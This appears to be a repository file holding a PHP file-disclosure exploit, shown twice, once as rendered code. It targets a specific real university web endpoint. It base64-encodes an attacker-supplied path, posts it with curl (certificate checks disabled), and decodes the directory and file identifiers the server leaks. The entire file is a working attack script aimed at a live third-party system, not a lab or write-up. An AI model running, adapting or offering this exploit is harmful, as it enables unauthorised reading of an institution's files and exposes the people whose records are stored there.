carlosernestolopez/proafac_xpl.php

## proafac_xpl.php
<?php

# Proafac File Disclosure Exploit
# By Carlos E. López
# celopez.ni1990@gmail.com

$dir = base64_encode($argv[1]);
$cmd = 'curl --insecure https://proafac.unanleon.edu.ni/actas/indice.php --data "path='.$dir.'"';
$info = shell_exec($cmd);

preg_match_all('|pathdestino\(document\.frm1,\'(.*?)\'\)|', $info, $matches);
foreach($matches[1] as $match)
  print base64_decode( $match )."\n";

preg_match_all('|idfile=(.*?)"|', $info, $matches);
foreach($matches[1] as $match)
  print base64_decode( $match )."\n";
	<?php

	# Proafac File Disclosure Exploit
	# By Carlos E. López
	# celopez.ni1990@gmail.com

	$dir = base64_encode($argv[1]);
	$cmd = 'curl --insecure https://proafac.unanleon.edu.ni/actas/indice.php --data "path='.$dir.'"';
	$info = shell_exec($cmd);

	preg_match_all('\|pathdestino\(document\.frm1,\'(.*?)\'\)\|', $info, $matches);
	foreach($matches[1] as $match)
	print base64_decode( $match )."\n";

	preg_match_all('\|idfile=(.*?)"\|', $info, $matches);
	foreach($matches[1] as $match)
	print base64_decode( $match )."\n";